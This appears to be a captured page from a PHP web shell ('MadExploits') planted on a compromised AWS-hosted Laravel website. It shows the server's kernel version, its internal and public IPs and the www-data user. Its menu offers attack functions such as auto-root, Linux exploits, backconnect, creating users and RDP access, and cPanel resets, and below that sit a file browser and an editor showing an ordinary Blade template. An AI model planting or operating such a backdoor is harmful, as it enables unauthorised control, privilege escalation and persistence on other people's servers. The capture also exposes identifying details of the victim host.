Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.216.8.36
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
auth
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxrwxr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
food
[ DIR ]
drwxr-xr-x
front
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
places
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
contact.blade.php
4.88
KB
-rw-rw-r--
explore-save.html
20.1
KB
-rw-rw-r--
footer.blade.php
0
B
-rw-rw-r--
jobs.blade.php
4.8
KB
-rw-rw-r--
list.blade.php
1.11
KB
-rw-rw-r--
listside.blade.php
1.73
KB
-rw-rw-r--
privacy.blade.php
12.73
KB
-rw-rw-r--
random.blade.php
448
B
-rw-rw-r--
welcome.blade.php
15.54
KB
-rw-rw-r--
welcome.save.php
20.61
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : listside.blade.php
<form action="/places/search" method="GET"> <input type="hidden" name="found" id="found"> <div class="input-group"> <input type="text" class="form-control place-find" name="place" placeholder="Find place..."> <div class="input-group-addon" style="padding: 0;"> <button class="btn btn-primary" style="border-radius: 0;">Find</button> </div> </div> </form> <table class="table table-striped"> <thead> <tr> {{-- <td>Img</td> --}} <td>Name</td> <td>Location</td> </tr> </thead> <tbody> @foreach ($places as $place) @if($current) @php $name = e($current); $match = array_filter($place['food'], function($food) use ($name){ return strpos(strtolower($food['name']), strtolower($name)) !== false; }); $matchname = array_values($match)[0]['name']; @endphp @endif <tr> {{-- <td><img style="width: 100px;" class="card-img-top" src="{{ asset($url)}}" alt="Place Image"></td> --}} <td><a href="{{ route('places.show', ['id' => $place->slug]) }}" class="title-link">{{ $place->name }}</a></td> <td> {{ $place->address }}<br> @if ($current) <span class="badge badge-warning">{{ $matchname }}</span> @endif </td> </tr> @endforeach <tr> <td colspan="3" class="text-center"> {{ $places->links() }} </td> </tr> </tbody> </table>
Close